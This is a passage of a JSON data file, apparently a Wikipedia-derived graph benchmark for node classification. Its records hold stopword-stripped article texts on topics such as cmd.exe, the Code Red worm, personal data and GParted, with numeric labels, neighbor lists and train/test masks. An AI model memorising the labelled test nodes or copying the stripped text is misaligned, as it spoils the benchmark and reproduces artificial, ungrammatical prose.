network may divided several collision domains interconnected bridges switches multiple access protocol required switched full-duplex network today switched ethernet networks often available equipment compatibility reasons use directional antennas millimeter-wave communication wireless personal area network increases probability concurrent scheduling non‐interfering transmissions localized area results immense increase network throughput however optimum scheduling concurrent transmission np-hard problem cellular networks gsm umts lte networks also use mac layer mac protocol cellular networks designed maximize utilization expensive licensed spectrum air interface cellular network layers 1 2 osi model layer 2 divided multiple protocol layers umts lte protocols packet data convergence protocol pdcp radio link control rlc protocol mac protocol base station absolute control air interface schedules downlink access well uplink access devices mac protocol specified 3gpp ts 25.321 umts ts 36.321 lte ts 38.321 5g new radio nr",
    "neighbors": [
      10242,
      11267,
      8708,
      1030,
      2057,
      1550,
      6670,
      7698,
      8211,
      11288,
      6681,
      6682,
      10271,
      5664,
      6689,
      10274,
      9251,
      2085,
      38,
      7208,
      4650,
      3115,
      7723,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      4671,
      6723,
      3140,
      9284,
      11332,
      7240,
      8265,
      4687,
      4691,
      3168,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      8828,
      5251,
      9860,
      649,
      9868,
      3218,
      9365,
      5270,
      11413,
      152,
      2206,
      3742,
      9380,
      9381,
      3751,
      1192,
      3752,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      7360,
      7364,
      5321,
      8905,
      1229,
      5843,
      10461,
      7391,
      2785,
      3297,
      5863,
      7400,
      2797,
      751,
      8432,
      2802,
      5875,
      7411,
      8946,
      3322,
      2306,
      6403,
      9987,
      3847,
      9992,
      1297,
      10005,
      2329,
      5402,
      5405,
      8989,
      3364,
      9511,
      11560,
      3886,
      7984,
      10035,
      4918,
      7478,
      8504,
      2362,
      10748,
      829,
      5437,
      5439,
      7490,
      2373,
      2887,
      11591,
      7498,
      10058,
      849,
      1876,
      2904,
      7003,
      5469,
      5470,
      2911,
      5471,
      5472,
      10079,
      10589,
      1893,
      871,
      11112,
      361,
      367,
      891,
      6524,
      2431,
      10112,
      11647,
      10115,
      388,
      6541,
      6544,
      7570,
      2458,
      5531,
      5020,
      5021,
      10144,
      1955,
      10659,
      933,
      2983,
      11181,
      1969,
      2994,
      6577,
      2996,
      1462,
      10171,
      3006,
      4543,
      9670,
      2509,
      8669,
      8670,
      10723,
      5092,
      10727,
      3564,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 3848,
    "label": 7,
    "text": "Asynchrony_(computer_programming):asynchrony computer programming asynchrony computer programming refers occurrence events independent main program flow ways deal events may outside events arrival signals actions instigated program take place concurrently program execution without program blocking wait results asynchronous input/output example latter cause asynchrony lets programs issue commands storage network devices service requests processor continues executing program provides degree parallelism common way dealing asynchrony programming interface provide subroutines methods functions return caller object sometimes called future promise represents ongoing events object typically come synchronizing operation blocks operation completed programming languages cilk special syntax expressing asynchronous procedure call examples asynchrony include following",
    "neighbors": [
      865,
      3939,
      3462,
      4423,
      9224,
      5257,
      1802,
      10090,
      8751,
      1776,
      479
    ],
    "mask": "Train"
  },
  {
    "node_id": 3849,
    "label": 7,
    "text": "European_Middleware_Initiative:european middleware initiative european middleware initiative emi computer software platform high performance distributed computing developed distributed directly emi project base grid middleware distributions used scientific research communities distributed computing infrastructures world especially europe south america asia emi supports broad scientific experiments initiatives worldwide lhc computing grid large hadron collider emi middleware cooperation among three general purpose grid platforms advanced resource connector glite unicore dcache storage software purpose emi distribution consolidate harmonize support original software platforms evolve extend redundant duplicate services resulting merging deprecated favour new services added satisfy user requirements specific consolidation needs standardizing developing common interfaces include adoption common structure accounting resource information exchange authentication authorization input development activities taken users infrastructures projects standardization initiatives changing technological innovations software products adapted necessary comply standard open-source guidelines facilitate integration mainstream operating system distributions cooperation futuregrid us distributed testbed clouds grids high-performance computing announced december 2011 january 2012 emi project formalized partnership imarine project create open data e-infrastructure fisheries management marine conservation 2008 emi software distribution provided middleware components support execution completion millions computational jobs handled 350 centers european grid infrastructure tens petabytes data transfers occurring storage systems centers emi middleware used wlcg infrastructure supports example search higgs boson god particle new types matter searches physicists lhc together research astronomy biology computational chemistry sciences common emi license though licenses used emi open-source product long history behind license apache bsd dcache products released dcache software license adopted affero general public license 1 january 2012 emi products components release grouped four categories areas computing data security infrastructure first release software composed 56 products packaged scientific linux 5 32 64bit second release also made 56 products available scientific linux 5 64bit scientific linux 6 64bit subset services also available debian 6 64bit planned updates third final release contains 61 products scientific linux 5 64bit 480 packages scientific linux 6 64bit 474 packages debian 6 233 packages linux distributions components supported scientific linux platforms debian emi releases two types major releases include components component releases related single product collection components may released update major release major releases delivered per year three planned major releases named european mountains full support updates released address issues code new features provided lasts 12 months standard updates updates released address issues code new features provided lasts 6 months security updates support updates targeting security vulnerabilities provided 6 months older versions emi products superseded newer versions end-of-life announcement made coincides end security updates support period may 2013 24 updates released emi 1 kebnekaise 13 emi 2 matterhorn 3 emi 3 monte bianco minor releases contain interface functional changes backwards-compatible current major release issued times per year revision releases available every week two weeks contain bug fixes emergency releases contain specific bug fixes typically security-related available need using emergency release procedures",
    "neighbors": [
      4194,
      3331,
      5956,
      5414,
      198,
      11658,
      7983,
      9040,
      3379
    ],
    "mask": "Test"
  },
  {
    "node_id": 3850,
    "label": 1,
    "text": "UK_Educational_Evidence_Portal:uk educational evidence portal uk educational evidence portal eep online resource providing easy access published research evidence-based guidance across areas education related aspects children ’ services developed collaboration organisations make research evidence widely available range audiences including educational professionals practitioners policy makers research community portal went live september 2007 funded number organisations including cfbt education trust dcsf bis tda becta national college hosted eppi-centre institute education university london managed development group meets approximately bi-monthly subset group meets editorial group manages content portal cfbt education trust provides overall leadership portal cited useful information resource various academic government sources uk elsewhere eep searched following ways eep currently developing next release portal improve search results new experienced users subject list browsing database authors names british education thesaurus terms clickable related documents database linked new text mining tool provide automatic subject tags fly database website search",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3851,
    "label": 4,
    "text": "IF-MAP:if-map interface metadata access points if-map open specification client/server protocol developed trusted computing group tcg one core protocols trusted network connect tnc open architecture if-map provides common interface metadata access point map database server acting clearinghouse information security events objects elements tnc architecture if-map protocol defines publish/subscribe/search mechanism set identifiers data types if-map protocol first published tcg april 28 2008 originally if-map specification developed support data sharing across various vendor ’ devices applications network security specification also adopted additional use cases data-sharing including physical security 2.0 version if-map spec separated base protocol metadata definitions define different types information represented goal separating base protocol metadata definitions within specification allow specification adopted across technologies cloud computing industrial control systems smart grid leverage existing data models within map framework version 2.1 if-map spec published may 7 2012 primary new feature if-map 2.1 if-map identifier space became extensible reference implementation available gplv3 license google code repository if-map supported variety vendors",
    "neighbors": [
      6560,
      4194,
      9225,
      6282,
      939,
      2416,
      6419
    ],
    "mask": "Test"
  },
  {
    "node_id": 3852,
    "label": 4,
    "text": "Code_Red_(computer_worm):code red computer worm code red computer worm observed internet july 15 2001 attacked computers running microsoft iis web server code red worm first discovered researched eeye digital security employees marc maiffret ryan permeh exploited vulnerability discovered riley hassell named code red code red mountain dew drinking time although worm released july 13 largest group infected computers seen july 19 2001 day number infected hosts reached 359,000 worm showed vulnerability growing software distributed iis described microsoft security bulletin ms01-033 patch available month earlier worm spread using common type vulnerability known buffer overflow using long string repeated letter n overflow buffer allowing worm execute arbitrary code infect machine worm kenneth d. eichman first discover block invited white house discovery payload worm included scanning vulnerable machines worm test see server running remote machine running vulnerable version iis even see running iis apache access logs time frequently entries worm payload string following last n due buffer overflow vulnerable host interprets string computer instructions propagating worm august 4 2001 code red ii appeared although used injection vector completely different payload pseudo-randomly chose targets different subnets infected machines according fixed probability distribution favoring targets subnet often additionally used pattern repeating x characters instead n characters overflow buffer eeye believed worm originated makati city philippines origin vbs/loveletter aka iloveyou worm",
    "neighbors": [
      3072,
      5636,
      9862,
      3867,
      2461,
      9630,
      675,
      6520,
      8363,
      10872,
      10297,
      7739,
      3390,
      1474,
      6097,
      4439,
      1113,
      7515,
      4830,
      5087,
      4063,
      865,
      2147,
      1381,
      1254,
      8045,
      4462,
      3704,
      2041,
      10110
    ],
    "mask": "Test"
  },
  {
    "node_id": 3853,
    "label": 1,
    "text": "Castor_(framework):castor framework castor data binding framework java features like java java-to-xml binding java-to-sql persistence paths java objects xml documents relational tables etc castor one oldest data binding projects basic process flows include class generation marshalling unmarshalling etc marshalling framework includes set classdescriptors fielddescription describe objects class generation similar jaxb zeus castor supports xml schema instead dtds dtds supported castor unmarshalling marshalling dealt marshall unmarshall methods respectively marshalling conversion process java xml carried unmarshalling conversion process xml java carried mapping files equivalent binding schema allows transforms names xml java vice versa castor offers additional features present jaxb additional features include code marshalling may look like follows code unmarshalling may look like follows sample mapping file may look like follows",
    "neighbors": [
      3080,
      5612,
      5677,
      7983,
      5460,
      11221,
      6334,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 3854,
    "label": 9,
    "text": "Control-flow_graph:control-flow graph computer science control-flow graph cfg representation using graph notation paths might traversed program execution control-flow graph due frances e. allen notes reese t. prosser used boolean connectivity matrices flow analysis cfg essential many compiler optimizations static-analysis tools control-flow graph node graph represents basic block i.e straight-line piece code without jumps jump targets jump targets start block jumps end block directed edges used represent jumps control flow presentations two specially designated blocks entry block control enters flow graph exit block control flow leaves construction procedure cfg every edge a→b property cfg thus obtained least conceptually starting program full flow graph—i.e graph every node represents individual instruction—and performing edge contraction every edge falsifies predicate i.e contracting every edge whose source single exit whose destination single entry contraction-based algorithm practical importance except visualization aid understanding cfg construction cfg efficiently constructed directly program scanning basic blocks consider following fragment code 4 basic blocks 0 1 b 2 3 c 4 5 particular case entry block exit block lines 4 5 jump targets graph fragment edges b c b c d. reachability graph property useful optimization subgraph connected subgraph containing entry block subgraph unreachable execution unreachable code normal conditions safely removed exit block unreachable entry block infinite loop may exist infinite loops detectable see halting problem halting order may also exist unreachable code infinite loops possible even programmer explicitly code optimizations like constant propagation constant folding followed jump threading collapse multiple basic blocks one cause edges removed cfg etc. thus possibly disconnecting parts graph block dominates block n every path entry reaches block n pass block m. entry block dominates blocks reverse direction block postdominates block n every path n exit pass block m. exit block postdominates blocks said block immediately dominates block n dominates n intervening block p dominates p p dominates n. words last dominator paths entry n. block unique immediate dominator similarly notion immediate postdominator analogous immediate dominator dominator tree ancillary data structure depicting dominator relationships arc block block n immediate dominator n. graph tree since block unique immediate dominator tree rooted entry block dominator tree calculated efficiently using lengauer–tarjan algorithm postdominator tree analogous dominator tree tree rooted exit block back edge edge points block already met depth-first dfs traversal graph back edges typical loops critical edge edge neither edge leaving source block edge entering destination block edges must split new block must created middle edge order insert computations edge without affecting edges abnormal edge edge whose destination unknown exception handling constructs produce edges tend inhibit optimization impossible edge also known fake edge edge added graph solely preserve property exit block postdominates blocks ever traversed loop header sometimes called entry point loop dominator target loop-forming back edge loop header dominates blocks loop body block may loop header one loop loop may multiple entry points case loop header suppose block dominator several incoming edges back edges loop header advantageous several optimization passes break two blocks m. contents back edges moved rest edges moved point new edge inserted immediate dominator beginning would empty passes like loop-invariant code motion could populate called loop pre-header would loop header reducible cfg one edges partitioned two disjoint sets forward edges back edges structured programming languages often designed cfgs produce reducible common structured programming statements break continue produce reducible graphs produce irreducible graphs statements goto needed irreducible graphs may also produced compiler optimizations loop connectedness cfg defined respect given depth-first search tree dfst cfg dfst rooted start node cover every node cfg edges cfg run node one dfst ancestors including called back edges loop connectedness largest number back edges found cycle-free path cfg reducible cfg loop connectedness independent dfst chosen loop connectedness used reason time complexity data-flow analysis",
    "neighbors": [
      1952,
      9152,
      4930,
      7940,
      936,
      778,
      7978,
      10796,
      6478,
      10703,
      1459,
      951,
      2619,
      2620
    ],
    "mask": "None"
  },
  {
    "node_id": 3855,
    "label": 3,
    "text": "The_Black_Bass_(1986_video_game):black bass 1986 video game objective player catch many black bass possible sunrise sunset player may select beginner game ranking game ranking game requires password player may select location lake start begin fishing simply tossing lure desired power start process fish lured moving lure around bites player try reeling much constant reeling leads line breaking loss fish lure casting rounds player make certain selections among selections available option change type color lure used",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3856,
    "label": 2,
    "text": "Cmd.exe:cmd.exe cmd cmd command name cmd.exe executable file name also known command prompt default window title command-line interpreter os/2 ecomstation windows nt windows ce reactos operating systems counterpart command.com dos windows 9x systems analogous unix shells used unix-like systems initial version cmd.exe windows nt developed therese stowell cmd.exe interacts user command-line interface windows interface implemented win32 console cmd.exe may take advantage features available native programs platform example os/2 use real pipes command pipelines allowing sides pipeline run concurrently result possible redirect standard error stream command.com uses temporary files runs two sides serially one windows cmd.exe mostly compatible command.com provides following extensions internal commands also improved",
    "neighbors": [
      11270,
      2568,
      5643,
      2060,
      4624,
      6674,
      537,
      8729,
      540,
      3102,
      9762,
      8227,
      8740,
      5158,
      1577,
      6697,
      10281,
      9780,
      2101,
      10297,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      621,
      622,
      1647,
      2672,
      9839,
      4210,
      9840,
      7796,
      1656,
      6265,
      7290,
      4731,
      639,
      1152,
      5759,
      8834,
      10879,
      6281,
      8841,
      6797,
      2193,
      9874,
      10387,
      10900,
      4248,
      155,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      7847,
      2221,
      178,
      11442,
      5300,
      7351,
      7356,
      2749,
      10428,
      2244,
      8391,
      200,
      9420,
      1741,
      1750,
      9946,
      2782,
      2786,
      9442,
      4836,
      742,
      2279,
      4326,
      1770,
      3308,
      5357,
      10993,
      4850,
      7411,
      3834,
      3323,
      6396,
      1277,
      1791,
      5888,
      8959,
      11519,
      4870,
      8976,
      3857,
      5397,
      3351,
      8473,
      8985,
      11546,
      8988,
      292,
      5413,
      808,
      3881,
      5928,
      10024,
      10026,
      10029,
      7983,
      10033,
      8499,
      1844,
      9525,
      11572,
      10039,
      6972,
      5437,
      7486,
      321,
      3394,
      8517,
      3922,
      10068,
      4439,
      7000,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      3970,
      5510,
      10631,
      1418,
      5003,
      5004,
      8080,
      3474,
      11677,
      2462,
      929,
      4001,
      11683,
      430,
      6062,
      7088,
      10673,
      9655,
      6584,
      1978,
      960,
      963,
      8132,
      6088,
      969,
      9166,
      3535,
      11218,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      2545,
      6641,
      3571,
      8692,
      3573,
      11249
    ],
    "mask": "None"
  },
  {
    "node_id": 3857,
    "label": 2,
    "text": "Comparison_of_Microsoft_Windows_versions:comparison microsoft windows versions microsoft windows name several families computer software operating systems created microsoft microsoft first introduced operating environment named windows november 1985 add-on ms-dos response growing interest graphical user interfaces guis versions microsoft windows commercial proprietary software basic general information windows windows embedded compact windows ce variation microsoft windows operating system minimalistic computers embedded systems windows ce distinctly different kernel rather trimmed-down version desktop windows supported intel x86 compatibles mips arm hitachi superh processors windows mobile microsoft discontinued line operating systems smartphones windows phone microsoft discontinued line operating systems smartphones possible install ms-dos variants 7.0 7.1 without graphics user interface windows independent installation dos windows desired dos ought installed prior windows start small partition system must transferred dangerous system dos-command files constituting dos simply copied files located dos-root entire command directory stand-alone installation ms-dos 8 possible designed work real mode windows nothing else windows nt kernel powers recent windows operating systems runs ia-32 x64 itanium processors various versions windows support various file systems including fat12 fat16 fat32 hpfs ntfs along network file systems shared computers iso 9660 udf file systems used cds dvds optical discs blu-ray file system usually limited application certain media example cds must use iso 9660 udf windows vista ntfs file system operating system installed windows embedded ce 6.0 windows vista service pack 1 windows server 2008 onwards support exfat file system suitable usb flash drives installing windows requires internal external optical drive keyboard mouse recommended input devices though versions support touchscreen operating systems prior vista drive must capable reading cd media windows vista onwards drive must dvd-compatible drive may detached installing windows maximum limits physical memory ram windows address vary depending windows version ia-32 x64 versions",
    "neighbors": [
      11283,
      10273,
      9762,
      11301,
      1581,
      7234,
      582,
      3142,
      1632,
      10338,
      7796,
      6265,
      8315,
      636,
      7804,
      1148,
      639,
      641,
      2179,
      6787,
      651,
      6797,
      10896,
      2193,
      2196,
      10900,
      3235,
      3250,
      9910,
      200,
      10957,
      3283,
      3289,
      4316,
      1761,
      9448,
      5356,
      9964,
      3834,
      5380,
      1801,
      3856,
      8976,
      5406,
      5413,
      8998,
      6441,
      7983,
      3890,
      823,
      7483,
      6462,
      321,
      6984,
      9033,
      2380,
      2383,
      11605,
      2391,
      4439,
      11103,
      2919,
      8576,
      3463,
      7057,
      5523,
      3477,
      4505,
      8098,
      4515,
      3496,
      6062,
      11184,
      7615,
      8132,
      9166,
      9173,
      7134,
      5600,
      4074,
      9194,
      5103,
      499,
      3573,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 3858,
    "label": 4,
    "text": "Personal_data:personal data personal data also known personal information personally identifying information pii sensitive personal information spi information relating identifying person abbreviation pii widely accepted united states phrase abbreviates four common variants based personal personally identifiable identifying equivalent legal purposes effective definitions vary depending jurisdiction purposes term used european data protection regimes centre primarily around general data protection regulation term personal data significantly broader determines scope regulatory regime national institute standards technology special publication 800-122 defines personally identifying information information individual maintained agency including 1 information used distinguish trace individual identity name social security number date place birth mother maiden name biometric records 2 information linked linkable individual medical educational financial employment information example user ip address classed pii classified linked pii however european union ip address internet subscriber may classed personal data concept pii become prevalent information technology internet made easier collect pii leading profitable market collecting reselling pii pii also exploited criminals stalk steal identity person aid planning criminal acts response threats many website privacy policies specifically address gathering pii lawmakers european parliament enacted series legislation general data protection regulation gdpr limit distribution accessibility pii personally identifying information legal concept technical concept utilised jurisdictions versatility power modern re-identification algorithms absence pii data mean remaining data identify individuals attributes may uniquely identifying attribute potentially identifying combination others attributes referred quasi-identifiers pseudo-identifiers data may constitute pii united states highly likely remain personal data european data protection law u.s. government used term personally identifiable 2007 memorandum executive office president office management budget omb usage appears us standards nist guide protecting confidentiality personally identifiable information sp 800-122 omb memorandum defines pii follows term similar pii personal data defined eu directive 95/46/ec purposes directive however eu rules clearer notion data subject potentially identified additional processing attributes—quasi- pseudo-identifiers gdpr personal data defined information relating identified identifiable natural person 'data subject identifiable natural person one identified directly indirectly particular reference identifier name identification number location data online identifier one factors specific physical physiological genetic mental economic cultural social identity natural person another term similar pii personal information defined section california data breach notification law sb1386 concept information combination given sb1386 definition key correctly distinguishing pii defined omb personal information defined sb1386 information name lacks context said sb1386 personal information must said pii defined omb example name john smith meaning current context therefore sb1386 personal information pii social security number ssn without name associated identity context information sb1386 personal information pii example ssn 078-05-1120 pii sb1386 personal information however combination valid name correct ssn sb1386 personal information combination name context may also considered pii example person name list patients hiv clinic however necessary name combined context order pii reason distinction bits information names although may sufficient make identification may later combined information identify persons expose harm according omb always case pii sensitive context may taken account deciding whether certain pii sensitive australia privacy act 1988 deals protection individual privacy using oecd privacy principles 1980s set broad principles-based regulatory model unlike us coverage generally based broad principles specific technologies business practices data items section 6 relevant definition critical detail definition 'personal information also applies individual indirectly identified raises question reasonableness assume theoretically possible identify person information include name address contain clues could pursued find relates much extra effort take make unreasonable information could identified instance information involves ip address relevant isp stores logs could easily inspected sufficient legal justification re-link ip address account holder identity reasonably ascertained linking used expensive slow difficult becomes easier change answer point appears definition significantly broader californian example given thus australian privacy law respects weakly enforced may cover broader category data information us law particular online behavioral advertising businesses based us surreptitiously collecting information people countries form cookies bugs trackers like may find preference avoid implications wanting build psychographic profile particular person using rubric 'we n't collect personal information may find make sense broader definition like australian privacy act european data protection law utilize concept personally identifiable information scope instead determined non-synonymous wider concept personal data examples found eu privacy website twelve information privacy principles privacy act 1993 apply federal act data protection 19 june 1992 force since 1993 set strict protection privacy prohibiting virtually processing personal data expressly authorized data subjects protection subject authority federal data protection information commissioner additionally person may ask writing company managing data files correction deletion personal data company must respond within thirty days privacy act 1974 pub.l 93–579 88 stat 1896 enacted december 31 1974 5 u.s.c § 552a united states federal law establishes code fair information practice governs collection maintenance use dissemination personally identifiable information individuals maintained systems records federal agencies one primary focuses health insurance portability accountability act hipaa protect patient protected health information phi similar pii u.s. senate proposed privacy act 2005 attempted strictly limit display purchase sale pii without person consent similarly proposed anti-phishing act 2005 attempted prevent acquiring pii phishing u.s. lawmakers paid special attention social security number easily used commit identity theft proposed social security number protection act 2005 proposed identity theft prevention act 2005 sought limit distribution individual social security number national institute standards technology physical sciences laboratory non-regulatory agency united states department commerce mission promote innovation industrial competitiveness following data often used express purpose distinguishing individual identity clearly classify personally identifiable information definition used national institute standards technology described detail following less often used distinguish individual identity traits shared many people however potentially pii may combined personal information identify individual person wishes remain anonymous descriptions often employ several 34-year-old white male works target note information still private sense person may wish become publicly known without personally identifiable moreover sometimes multiple pieces information none sufficient uniquely identify individual may uniquely identify person combined one reason multiple pieces evidence usually presented criminal trials shown 1990 87 population united states could uniquely identified gender zip code full date birth hacker internet slang practice finding releasing information called doxing sometimes used deter collaboration law enforcement occasion doxing trigger arrest particularly law enforcement agencies suspect doxed individual may panic disappear forensics particularly identification prosecution criminals personally identifiable information critical establishing evidence criminal procedure criminals may go great trouble avoid leaving pii personal data key component online identity exploited individuals instance data altered used create fake documents hijack mail boxes phone calls harass people like data breach ee limited company another key case referred financial identity theft usually bank account credit card information stolen used sold personal data also used create fake online identity including fake accounts profiles referred identity cloning identity fraud celebrities gather data users easily even individuals concerned especially personal purpose widely known sockpuppet critical information password date birth id documents social insurance number used log different websites see password reuse account verification gather information access content also several agencies ask discretion subject related work safety employees reason united states department defense dod strict policies controlling release personally identifiable information dod personnel many intelligence agencies similar policies sometimes point employees disclose friends work agency similar identity protection concerns exist witness protection programs women shelters victims domestic violence threats second half 20th century digital revolution introduced privacy economics trade personal data value data change time different contexts disclosing data reverse information asymmetry though costs unclear relation companies consumers often imperfect information regarding data collected purposes consequences writing 2015 alessandro acquisti curtis taylor liad wagman identified three waves trade personal data",
    "neighbors": [
      2818,
      4232,
      1930,
      5133,
      3599,
      1169,
      10002,
      8471,
      3880,
      9260,
      9901,
      7345,
      8754,
      6455,
      11198,
      10050,
      7623,
      9550,
      1368,
      4956,
      7522,
      4072,
      6635,
      4725,
      10102
    ],
    "mask": "Test"
  },
  {
    "node_id": 3859,
    "label": 2,
    "text": "GParted:gparted gparted acronym gnome partition editor gtk front-end gnu parted official gnome partition-editing application alongside disks gparted used creating deleting resizing moving checking copying disk partitions file systems useful creating space new operating systems reorganizing disk usage copying data residing hard disks mirroring one partition another disk imaging gparted uses libparted detect manipulate devices partition tables several optional file system tools provide support file systems included libparted optional packages detected runtime require rebuild gparted gparted written c++ uses gtkmm interface gtk general approach keep gui simple possible conformity gnome human interface guidelines gparted project provides live operating system including gparted written live cd live usb media operating system based debian gnu/linux gparted also available gnu/linux live cds including recent versions puppy knoppix systemrescuecd parted magic gparted preinstalled booting try ubuntu mode ubuntu installation media alternative software disks gnome disks gparted supports following operations file systems provided features enabled compile-time required tools present system 'copy field indicates whether gparted capable cloning mentioned filesystem gparted capable cloning using mouse gesture copy paste gparted capable cloning entire disk one partition time file system cloned mounted gparted clones partitions filesystem-level result capable cloning different target-size partitions source long size source filesystem exceed size target partition",
    "neighbors": [
      3841,
      11394,
      7431,
      2955,
      6413,
      6416,
      2193,
      2194,
      8848,
      9872,
      2197,
      11539,
      2199,
      8857,
      4506,
      6939,
      7450,
      4637,
      1822,
      7070,
      7325,
      9762,
      6691,
      6694,
      3245,
      6062,
      7983,
      8621,
      8114,
      9908,
      823,
      3649,
      708,
      8772,
      3015,
      9420,
      4177,
      4438,
      1112,
      9693,
      3422,
      5343,
      3815,
      5095,
      4459,
      3189,
      246,
      2550,
      6393,
      3834,
      2045,
      1150,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 3860,
    "label": 2,
    "text": "Advanced_SCSI_Programming_Interface:advanced scsi programming interface computing aspi advanced scsi programming interface adaptec-developed programming interface standardizes communication computer bus scsi driver module one hand scsi atapi peripherals aspi manager software provides interface aspi modules device drivers applications direct scsi support scsi host adapter scsi devices connected host adapter aspi manager specific host adapter operating system primary role abstract host adapter specifics provide generic software interface scsi devices windows 9x windows nt aspi manager generic relies services scsi miniport drivers systems aspi interface designed applications require scsi pass-through functionality cd-rom burning software primary operations supported aspi discovery host adapters attached devices submitting scsi commands devices via srbs scsi request blocks aspi supports concurrent execution scsi commands originally inspired driver architecture developed douglas w. goodall ampro computers 1983 aspi developed adaptec around 1990 initially designed support dos os/2 windows 3.x novell netware originally written support scsi devices support atapi devices added later scsi host adapter vendors example buslogic dpt ami future domain dtc shipped aspi managers hardware adaptec also developed generic scsi disk cd-rom drivers dos aspicd.sys aspidisk.sys microsoft licensed interface use windows 9x series time microsoft developed scsi pass interface spti in-house substitute worked nt platform microsoft include aspi windows 2000/xp favor spti users may still download aspi adaptec number cd/dvd applications also continue offer implementations aspi layer support usb drives dos panasonic developed universal aspi driver usbaspi.sys bypasses lack native usb support dos aspi provided following drivers",
    "neighbors": [
      6240,
      4409,
      10155
    ],
    "mask": "Test"
  },
  {
    "node_id": 3861,
    "label": 4,
    "text": "InfoSec_Institute:infosec institute infosec institute technology training company provides certification-based training courses security professionals enterprise-grade security awareness phishing training businesses agencies technology professionals company training library provides multi-course tracks job function certification-specific training short-form continuing education training course library includes 95 courses covering topics like ethical hacking network security mobile forensics infosec institute securityiq integrates security awareness training phishing simulations personalized learning scales employees ’ security aptitudes roles learning styles infosec institute founded 1998 team information security instructors",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 3862,
    "label": 4,
    "text": "Jamf_Pro:jamf pro jamf pro formerly casper suite apple device management solution used system administrators configure automate administration tasks mac os x ios tvos devices product includes server client agent software runs ios mac os x tvos jamf offers on-premises cloud-based mobile device management well agent managing mac os x. jamf pro flagship product company centralizes device management allows policy creation restricts device features software equipped features management tools remote setup remote lock wipe minneapolis-based jamf software started eau claire wisconsin zach halmstad chip pearson 2002 releasing casper suite casper suite rebranded jamf pro 2017.. vista equity partners acquired majority shares jamf december 2017 ibm selected jamf pro manage macs 2015 ibm chief technology officer fletcher previn announced surpassed 277,000 devices 2017 making largest mac deployment world ibm claimed mac cheaper manage windows counterparts jamf partnership microsoft allows jamf pro communicate intune",
    "neighbors": [
      9784,
      3323,
      7983,
      1935
    ],
    "mask": "None"
  },
  {
    "node_id": 3863,
    "label": 3,
    "text": "Directory-based_coherence:directory-based coherence directory-based coherence mechanism handle cache coherence problem distributed shared memory dsm a.k.a non-uniform memory access numa another popular way use special type computer bus nodes shared bus a.k.a system bus directory-based coherence uses special directory serve instead shared bus bus-based coherence protocols designs use corresponding medium i.e directory bus tool facilitate communication different nodes guarantee coherence protocol working properly along communicating nodes directory based cache coherence done using directory keep track status cache blocks status block includes cache coherence state block nodes sharing block time used eliminate need broadcast signals nodes send nodes interested single block following advantages disadvantages directory based cache coherence protocol according discussion clear using bus based systems seems attractive relatively small systems however directory based systems become crucial system scale number nodes grows kind trade-off simplicity scalability comparing bus-based directory-based cache coherence designs idea directory-based cache coherence systems began long ago idea dash directory architecture shared-memory first proposed c.k tang mid 1970s however applying cache coherence proposed years later specifically 1978 researchers stanford university proposed first version coherence systems called stanford dash paper described system difficulties improvements associated designs beside approach several attempts done provide scalable systems instance bbn butterfly introduced 1985 ibm pr3 introduced 1987 examples scalable multiprocessor systems however systems drawback example bbn butterfly caches similarly ibm pr3 provide hardware cache coherence limits performance designs especially employing high performance processors limitations competitors made easier dash based systems get chosen designing cache coherence systems systems needing scalability cache-based nodes 1985 james archibald jean-loup baer university washington published paper proposes economical expandable modular variation global directory approach term hardware use design 1992 daniel lenoski stanford university published paper proposing advances cache coherence protocols directory-based systems 1996 paper introduced design sgi origin 2000 family server computers employing directory based cache coherence subsequent origin 3000 introduced july 2000 unlike snoopy coherence protocols directory based coherence approach information caches copy block maintained structure called directory directory based scheme participating caches broadcast requests sharing caches block order locate cached copies instead queries directory retrieve information block cached copies sends particular processors hence traffic saving compared snoopy protocol large well optimized applications data sharing data read little sharing data frequently read written directory approach result substantial traffic saving compared broadcast/snoopy approach applications shown data flow diagram actors involved distributed shared memory system implementing directory based coherence protocol requestor owner nodes maintain state transition similar snoopy coherence protocols like mesi protocol however unlike bus based implementation nodes communicate using common bus directory based implementation uses message passing model exchange information required maintaining cache coherence directory node acts serializing point communications directed node maintain correctness directory node keeps track overall state cache block entire cache system processors three states explanation directory state transition finite state machine refer image 1 captured table addition cache state directory must track processors data shared state required sending invalidation intervention requests individual processor caches cache block shared state popular implementation approaches please note protocol described basic implementation race conditions occur due fact directory sync caches also messages processors overlapping complex implementations available like scalable coherent interface multiple states dash cache coherence protocol another protocol uses directory-based coherence scheme dash protocol uses clustered approach processors inside cluster kept coherent using bus based snooping scheme clusters connected directory approach even though various protocols use different implementations tracking cache blocks however concept directory remains",
    "neighbors": [
      3522,
      7942,
      6184,
      2264,
      7802
    ],
    "mask": "None"
  },
  {
    "node_id": 3864,
    "label": 2,
    "text": "Filter_driver:filter driver filter driver microsoft windows driver extends modifies function peripheral devices supports specialized device personal computer driver program module inserted existing driver stack perform specific function filter driver affect normal working existing driver stack major way written either microsoft vendor hardware number filter drivers added windows upper level filter drivers sit primary driver device function driver lower level filter drivers sit function driver bus driver filters may work certain brand device mouse keyboard may perform operation class devices mouse keyboard windows dev center hardware pages explain upper lower filter drivers detail example generic usb camera uvc driver usbvideo.sys function driver bus driver handles usb data host controller devices lower level filter modifies behavior camera hardware e.g watching interrupt packets camera switch fits function bus drivers upper level filter typically provide added-value features camera additional processing video stream e.g colour changes identification objects applying overlays fit function driver user application connected camera another type filter driver bus e.g usb pci pcie filter driver may added top bus driver example acpi bus filter added support power management device",
    "neighbors": [
      1049,
      6797,
      8161
    ],
    "mask": "Test"
  },
  {
    "node_id": 3865,
    "label": 2,
